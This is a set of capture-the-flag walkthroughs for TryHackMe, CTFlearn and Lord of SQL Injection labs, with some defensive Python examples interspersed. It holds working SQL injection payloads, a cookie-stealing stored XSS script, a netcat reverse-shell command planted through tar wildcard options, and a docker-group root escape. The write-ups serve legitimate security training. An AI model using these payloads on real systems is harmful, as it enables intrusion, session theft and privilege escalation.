TryHackMe solution: Poster

Link: https://tryhackme.com/room/poster

#1 “What is the rdbms installed on the server?”
#2 “What port is the rdbms running on?”

Use nmap to find open ports:

nmap -sCV 10.10.65.155

#3 “After starting Metasploit, search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the modules (starting with auxiliary)?”

Start Metasploit and use:

search PostgreSQL

The answer is entry number 7 in the search results.

#4 “What are the credentials you found?”

Set RHOSTS and run.

#5 “What is the full path of the module that allows you to execute commands with the proper user credentials (starting with auxiliary)?”

Start Metasploit and use:

search PostgreSQL

The answer is entry number 9 in the search results.

#6 “Based on the results of #6, what is the rdbms version installed on the server?”

Set RHOSTS, PASSWORD and run.

#7 “What is the full path of the module that allows for dumping user hashes (starting with auxiliary)?”

search postgres auxiliary hash

The answer is entry number 2 in the search results.

#8 “How many user hashes does the module dump?”

Set RHOSTS, PASSWORD and run.

#9 “What is the full path of the module (starting with auxiliary) that allows an authenticated user to view files of their choosing on the server?”

Start Metasploit and use:

search PostgreSQL

The answer is entry number 8 in the search results.

#10 “What is the full path of the module that allows arbitrary command execution with the proper user credentials (starting with exploit)?”

The answer is entry number 4 in the search results.

#11 “Compromise the machine and locate user.txt”

After getting a shell, read /var/www/html/config.php; we will find alison’s credentials there.

Get alison’s shell:

su - alison
cat /home/alison/user.txt

#12 “Escalate privileges and obtain root.txt”

Check what we can do with:

sudo -l

So we can run any command as root.

sudo cat /root/root.txt

TryHackMe solution: SQHell

Link: https://tryhackme.com/room/sqhell

#1 “Flag 1”

There is a SQL injection vulnerability in the login function, so we can login with:

username:' or 1=1#
password:a

#2 “Flag 2”

Read Terms and Conditions:

We add the header “X-Forwarded-For” to the request and send it to the server. The request looks like:

GET / HTTP/1.1
Host: 10.10.142.249
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: *

Save the request to a file named r.txt and use sqlmap:

sqlmap -r r.txt --dump --batch

#3 “Flag 3”

The register function does not work; viewing the page source we see:

There is a function that checks whether a username already exists.

Use sqlmap to find the flag:

sqlmap -u "http://10.10.174.62/register/user-check?username=a" --dbms=mysql --dump -D sqhell_3 -T flag --batch

#4 “Flag 4”

The request that shows a user’s information is vulnerable to SQLi:

http://10.10.142.249/user?id=1

Use:

user?id=0 or 1=1--

But there is only one user.

user?id=1 union select null,null,null--

This indicates that there are 3 columns.

When I use:

user?id=0 union select 1,null,null--

The server still returns a user, so I think there is another query behind it.

user?id=0 union select '1 union select null,null,null,null',null,null--

Now we have 4 columns.

Get the flag with:

user?id=0 union select '1 union select null,flag,null,null from flag',null,null--
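
To see why the nested payload works, here is an added example (not code from the room) of the same two-query pattern in Python with sqlite3: a constructed users/posts/flag schema, a vulnerable handler that concatenates first the id parameter and then the first query's own result into SQL, and a hardened handler that binds both values as parameters. Table and column names are assumptions.

```python
import sqlite3

# Constructed sample schema standing in for the room's database
FLAG = "THM{constructed-sample-flag}"
# The nested payload from the writeup, as it arrives in the id parameter
PAYLOAD = "0 union select '1 union select null,flag,null,null from flag',null,null--"


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(f"""
        create table users(id integer, username text, email text);
        create table posts(id integer, title text, body text, user_id integer);
        create table flag(flag text);
        insert into users values (1, 'alice', 'alice@example.test');
        insert into posts values (1, 'hello', 'first post', 1);
        insert into flag values ('{FLAG}');
    """)
    return con


def profile_vulnerable(con, user_id):
    # First query (3 columns): the id parameter is concatenated straight into the SQL
    user = con.execute(
        f"select id, username, email from users where id={user_id}").fetchone()
    if user is None:
        return None
    # Second query (4 columns): the *result* of the first query is concatenated in turn,
    # so a string smuggled through column 1 becomes SQL here (second-order injection)
    posts = con.execute(
        f"select id, title, body, user_id from posts where user_id={user[0]}").fetchall()
    return {"user": user, "posts": posts}


def profile_hardened(con, user_id):
    # Both values are bound as parameters: the payload is compared as data and never
    # matches an integer id, and a stored string could not become SQL in query two
    user = con.execute(
        "select id, username, email from users where id=?", (user_id,)).fetchone()
    if user is None:
        return None
    posts = con.execute(
        "select id, title, body, user_id from posts where user_id=?", (user[0],)).fetchall()
    return {"user": user, "posts": posts}


if __name__ == "__main__":
    db = make_db()
    print(profile_vulnerable(db, PAYLOAD)["posts"])   # the flag shows up in column two
    print(profile_hardened(db, PAYLOAD))              # None
```
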

#5 “Flag 5”

We have a hint.

Hint: Unless displayed on the page the flags are stored in the flag table in the flag column.

So we will try a payload:

/post?id=0+union+select+null,flag,null,null+from+flag#

TryHackMe solution: Unstable Twin

Link: https://tryhackme.com/room/unstabletwin

#1 “What is the build number of Vincent’s server?”

Use nmap:

nmap -sCV 10.10.109.159

Use dirsearch:

python3 dirsearch.py -u 10.10.128.70

Access: http://10.10.128.70/info

View the response and we can see a header: Build Number

#2 “Is this the only build? (Yay/Nay)”

Resend the request to /info and view the header again.

#3 “How many users are there?”
#4 “What colour is Vincent?”

We will test the API login:

http://10.10.128.70/api/login

If we use wrong credentials, we get:

Test for SQL injection:

We get a message:

So the login function is vulnerable to SQL injection. We can find the database version with the payload:

' union select sqlite_version(),null-- 

The server returns:

Name all the tables:

' union select name,null from sqlite_master where type='table'-- 

Name all the columns:

' union select sql,null from sqlite_master where tbl_name='users' and type='table'-- 

Get all accounts with:

' union select username,password from users -- 

#5 “What is Mary Ann’s SSH password”

Enumerate the database. Get all columns in notes with:

' union select sql,null from sqlite_master where tbl_name='notes' and type='table'-- 

Get all the notes with:

' union select cast(user_id as text),notes from notes-- 

And we have Mary Ann’s password:

eaf0651dabef9c7de8a70843030924d335a2a8ff5fd1b13c4cb099e66efe25ecaa607c4b7dd99c43b0c01af669c90fd6a14933422cf984324f645b84427343f4

We can crack the hash with CrackStation.

#6 “User Flag”

Connect over SSH:

ssh mary_ann@10.10.128.70

And we have the flag.

#7 “Final Flag”

We have a note in server_notes.txt.

So we need to find these images. And I found them in /opt/unstabletwin/.

Read the two .py files:

main_5000.py
main_5001.py

So we can get the image when accessing:

http://10.10.128.70/get_image?name=marnie

If we get nothing, refresh the page and we will have the image.

After getting all the images, we can extract the hidden files from them with:

steghide extract -sf marnie.jpeg

Then we have 5 text files. Reading mary_ann.txt gives:

You need to find all my children and arrange in a rainbow!

Concatenate the 4 strings in the order Red – Orange – Yellow – Green:

1DVsdb2uEE0k5HK4GAIZPS0Mby2jomUKLjvQ4OSwjKLNAAeCdl2J8BCRuXVXeVYvs6J6HKpZWPG8pfeHoNG1

This is a base62 string; we can decode it with an online Base62 decode tool.
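
Decoding can also be done offline. The decoder below is added here and is not the writeup's or any tool's code; it assumes the usual 0-9A-Za-z digit order but also tries 0-9a-zA-Z, since online tools differ, so pick whichever candidate decodes to readable text.

```python
# Assumed digit orderings: many base62 tools use 0-9A-Za-z, others 0-9a-zA-Z
ALPHABETS = {
    "0-9A-Za-z": "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
    "0-9a-zA-Z": "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",
}

# The concatenated string from the writeup
PAGE_STRING = "1DVsdb2uEE0k5HK4GAIZPS0Mby2jomUKLjvQ4OSwjKLNAAeCdl2J8BCRuXVXeVYvs6J6HKpZWPG8pfeHoNG1"


def base62_decode(text, alphabet=ALPHABETS["0-9A-Za-z"]):
    """Big-endian base-62 digits to bytes; leading '0' digits become leading zero bytes."""
    value = 0
    for ch in text:
        value = value * 62 + alphabet.index(ch)  # ValueError on a non-alphabet character
    zeros = len(text) - len(text.lstrip(alphabet[0]))
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    return b"\x00" * zeros + body


def base62_encode(data, alphabet=ALPHABETS["0-9A-Za-z"]):
    """Inverse of base62_decode, used here to round-trip check the decoder."""
    zeros = len(data) - len(data.lstrip(b"\x00"))
    value = int.from_bytes(data, "big")
    digits = ""
    while value:
        value, rem = divmod(value, 62)
        digits = alphabet[rem] + digits
    return alphabet[0] * zeros + digits


def decode_candidates(text):
    """Decode under each ordering; the candidate that is readable text is the right one."""
    return {name: base62_decode(text, alpha) for name, alpha in ALPHABETS.items()}


if __name__ == "__main__":
    for name, raw in decode_candidates(PAGE_STRING).items():
        print(name, raw)
```
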

TryHackMe solution: The Marketplace

Link: https://tryhackme.com/room/marketplace

#1 “What is flag 1?”

First, register a new user and log in. Viewing the first listing, there is a reporting feature.

In New listing, we can add a listing with a description; I think it may be vulnerable to XSS.

I try the payload:

<script>console.log(document.cookie)</script>

And it worked.

So we create a new listing whose description is the payload:

<script>
var req = new XMLHttpRequest();
req.open('post','/contact/a',true);
req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
req.send('message='+document.cookie);
</script>

This payload sends the cookie of anyone who views the listing to us as a message.

To make sure the admin views this listing, we report it using the “Report listing to admins” option.

After reporting, we will receive the admin’s cookie.

Use this cookie to access Administration panel and we get the first flag.
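
As an added defender's counterpart to the stored XSS above (not code from the room or the Marketplace application): a minimal Python rendering of a listing, with the vulnerable raw interpolation next to an escaped version, plus the cookie attributes and header that would have stopped this particular cookie exfiltration. Function and cookie names are illustrative.

```python
import html

# Constructed sample: a listing description carrying the writeup's cookie-stealing script
PAYLOAD = ("<script>var req = new XMLHttpRequest();req.open('post','/contact/a',true);"
           "req.send('message='+document.cookie);</script>")


def render_listing_vulnerable(title, description):
    # Interpolates user text straight into the page: every viewer's browser, including the
    # admin's when a reported listing is opened, executes the script
    return f"<h2>{title}</h2><p>{description}</p>"


def render_listing(title, description):
    # html.escape turns <, >, &, " and ' into entities, so the text is displayed, not run
    return f"<h2>{html.escape(title)}</h2><p>{html.escape(description)}</p>"


def session_cookie(token):
    # HttpOnly keeps the cookie out of document.cookie, so a script that does run cannot
    # read the session; Secure and SameSite limit where the browser will send it
    return f"Set-Cookie: token={token}; HttpOnly; Secure; SameSite=Lax; Path=/"


def security_headers():
    # A script-src without 'unsafe-inline' makes the browser refuse inline <script> blocks
    # like this one; it is defence in depth behind output escaping
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    print(render_listing_vulnerable("Item", PAYLOAD))
    print(render_listing("Item", PAYLOAD))
    print(session_cookie("example-token"))
```
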

#2 “What is flag 2? (User.txt)”

As the admin, we can see the list of users.

Clicking a user takes us to: /admin?user=1

I try:

/admin?user='

And we get an error message.

So this page is also vulnerable to SQLi, and the database is MySQL.

To find the tables in this database, we use:

/admin?user=0+union+select+group_concat(table_name),null,null,null+from+information_schema.tables+where+table_schema=database()#

Find all columns in table users.

/admin?user=0+union+select+group_concat(column_name),null,null,null+from+information_schema.columns+where+table_schema=database()+and+table_name='users'#

Dump all user records.

/admin?user=0+union+select+group_concat(id,':',isAdministrator,':',password,':',username),null,null,null+from+users#

Do the same for the messages table. Find all columns.

/admin?user=0+union+select+group_concat(column_name),null,null,null+from+information_schema.columns+where+table_schema=database()+and+table_name='messages'#

Dump all rows of this table.

/admin?user=0+union+select+group_concat(id,':',is_read,':',message_content,':',user_from,':',user_to),null,null,null+from+messages#

This is the message from system to jake, which contains jake’s SSH password.

SSH to the server:

ssh jake@10.10.85.26

And we have the second flag.

#3 “What is flag 3? (Root.txt)”

See what jake can run with sudo.

sudo -l

We can run file /opt/backups/backup.sh as michael.

This post guides us on abusing wildcards in tar.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your-ip> 1234 >/tmp/f" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Stand up a netcat listener on port 1234.

nc -lvnp 1234

Next, we give michael permission to use the files and run the script as michael:

chmod 777 backup.tar
chmod 777 shell.sh
sudo -u michael ./backup.sh

This gives us michael’s shell.
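
An added check for the tar wildcard problem this step relies on, written in Python and not part of the room or its backup script: assuming backup.sh runs something like tar cf backup.tar * in the working directory, the first function lists entries whose names tar would parse as options, and the second builds a tar argv that cannot be tricked that way. Paths and names are constructed for the demo.

```python
import os
import tempfile


def option_like_names(directory):
    # Entries whose names begin with '-' are what a bare wildcard (tar cf backup.tar *)
    # hands to tar as options; the --checkpoint-action entry is the one that runs a command
    return sorted(n for n in os.listdir(directory) if n.startswith("-"))


def safe_tar_argv(directory, archive):
    # Hardened invocation: '--' ends option parsing, and every member name is passed as
    # './name', so no entry can be parsed as an option whatever it is called.
    # Run it with subprocess.run(argv, check=True); nothing is executed here.
    names = sorted(os.listdir(directory))
    return ["tar", "-cf", archive, "-C", directory, "--"] + ["./" + n for n in names]


def demo():
    # Constructed directory reproducing the two planted names from the writeup
    d = tempfile.mkdtemp()
    for name in ("data.txt", "--checkpoint=1", "--checkpoint-action=exec=sh shell.sh"):
        open(os.path.join(d, name), "w").close()
    return option_like_names(d), safe_tar_argv(d, "/tmp/backup.tar")


if __name__ == "__main__":
    flagged, argv = demo()
    print("option-like names:", flagged)
    print("safe argv:", argv)
```
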

Michael is in the docker group, so we will create a new container that mounts the host’s root filesystem.

Use:

python3 -c 'import pty; pty.spawn("/bin/sh")'

to spawn a TTY shell.

See list of images with:

docker image ls

We will use alpine to create a container.

docker run -v /:/mnt --rm -it alpine sh

-v /:/mnt : mount the root directory of the host to /mnt inside the container
--rm : remove the container after the user exits
-it : interactive and assign a tty
alpine : image to use to create container
sh : binary to run when the container starts

And we have the flag in /mnt/root.

Reference: The Marketplace : TryHackMe

CTFlearn solution: Inj3ction Time

In this lab, we will find all tables with payload:

1 union SELECT null,table_name,null,null FROM information_schema.tables--

and we found table “w0w_y0u_f0und_m3”.

Then, we find all columns with payload:

1 union SELECT null,column_name,null,null FROM information_schema.columns--

and we found column “f0und_m3”.

Finally, we use payload:

1 union SELECT null,f0und_m3,null,null FROM w0w_y0u_f0und_m3--

And we find the flag.

Flag: abctf{uni0n_1s_4_gr34t_c0mm4nd}

Solution: Lord of SQL Injection alien

In this lab, the first query takes no as a number, but in the second one no is taken as a string, so we will use a payload like:

?no=1+union+select+char(97)#'+union+select+'a

When the first query executes, the hash (#) comments out the rest.

When the second one executes, the hash is inside the string, so it returns the string ‘a’.

The query is executed twice but needs to give different results, so we will create a condition that depends on time.

This expression returns true (1) or false (0) depending on the current time:

now()%2=1

We use sleep(1) to make the query wait for 1 second, which changes the result of now()%2.

!sleep(1)&&now()%2=1

This will return 0 or 1. Then char(97+(!sleep(1)&&now()%2=1),100,109,105,110) will return ‘admin’ or ‘bdmin’.

We will use the payload:

?no=1+union+select+char(97%2b(!sleep(1)%26%26now()%2=1),100,109,105,110)#'+union+select+char(96%2b(!sleep(1)%26%26now()%2=1),100,109,105,110)#

Solution: Lord of SQL Injection zombie

This stage is like ouroboros, but we cannot use a Quine because “ace” in “replace” is not allowed. So we will use a different way to retrieve what we entered.

The running query is recorded in the information_schema.processlist table, so we read it back from there with the payload:

?pw='+union+select+substr(info,38,70)+from+information_schema.processlist#

We use the substr() function to take only the part of the query that we entered.

Solution: Lord of SQL Injection ouroboros

In this lab, the payload

?pw='+or+1=1#

does not work. So we will use the UNION operator:

?pw=' union select 1#

The return value of the query is printed. But we need it to be the same as the value we entered.

So we will use a Quine SQLi; quines are also described on Wikipedia. A quine takes no input and produces a copy of its own source code as its only output.

Using this technique, we can pass this check:

($result['pw'] === $_GET['pw'])

Then, the payload would be:

?pw=' union SELECT REPLACE(REPLACE('" union SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine#',CHAR(34),CHAR(39)),CHAR(36),'" union SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine#') AS Quine#
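
To check that the payload really reproduces itself, here is an added Python model (not the lab's code) of the two REPLACE() calls MySQL evaluates for the injected column, together with a parameterised lookup (a constructed sqlite3 table stands in for the lab's) showing that binding pw as data instead of concatenating it makes the same payload return nothing.

```python
import sqlite3

# Inner template of the writeup's payload: '"' and '$' stand for the single quote and
# for the template itself, which the two REPLACE() calls put back
TEMPLATE = '" union SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine#'


def build_payload(template=TEMPLATE):
    # The pw value sent: the leading quote closes the server's literal, then the UNION row
    # is the REPLACE chain applied to the template (the template appears twice)
    return ("' union SELECT REPLACE(REPLACE('" + template + "',CHAR(34),CHAR(39)),CHAR(36),'"
            + template + "') AS Quine#")


def evaluate_replace_chain(template):
    # What MySQL computes for the injected column: REPLACE(REPLACE(t, '"', "'"), '$', t)
    with_single_quotes = template.replace(chr(34), chr(39))
    return with_single_quotes.replace(chr(36), template)


def hardened_lookup(pw):
    # Same check with a bound parameter (constructed sqlite3 table, not the lab's): pw is
    # compared as data and never spliced into the statement, so the payload matches no row
    con = sqlite3.connect(":memory:")
    con.execute("create table prob_ouroboros(id text, pw text)")
    con.execute("insert into prob_ouroboros values ('admin', 'constructed-pw')")
    row = con.execute("select pw from prob_ouroboros where pw=?", (pw,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    pw = build_payload()
    # the quine property that satisfies the PHP comparison $result['pw'] === $_GET['pw']
    print(evaluate_replace_chain(TEMPLATE) == pw)   # True
    print(hardened_lookup(pw))                       # None
```
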

Solution: Lord of SQL Injection phantom

In this lab, we need to find the email value of the row with no=1, so we will duplicate it with an INSERT statement.

We can insert multiple rows at once; to test this, we use the payload:

?joinmail=a'),+(2,'14.248.83.2','aa')#

It worked. Now we just need to replace the 'aa' value with the email. But MySQL does not allow the insert to read directly from the same table it is inserting into, so we change the payload a little:

?joinmail=b'),+(3,'14.248.83.2',(select+email+from+(select+email+from+prob_phantom+where+no=1)+as+a))#

Then, we find the email with no=1.

admin_secure_email@rubiya.kr